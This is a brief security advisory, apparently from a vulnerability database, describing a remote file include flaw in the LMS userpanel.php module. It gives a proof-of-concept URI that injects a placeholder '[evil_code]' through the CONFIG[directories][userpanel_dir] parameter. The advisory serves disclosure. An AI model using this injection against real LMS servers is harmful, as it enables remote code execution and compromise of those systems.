LMS Userpanel.PHP Remote File Include Vulnerability

LMS Userpanel.PHP Remote File Include Vulnerability

Attackers can use a browser to exploit these issues.

The following proof-of-concept URI is available:

http://www.example.com/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=[evil_code]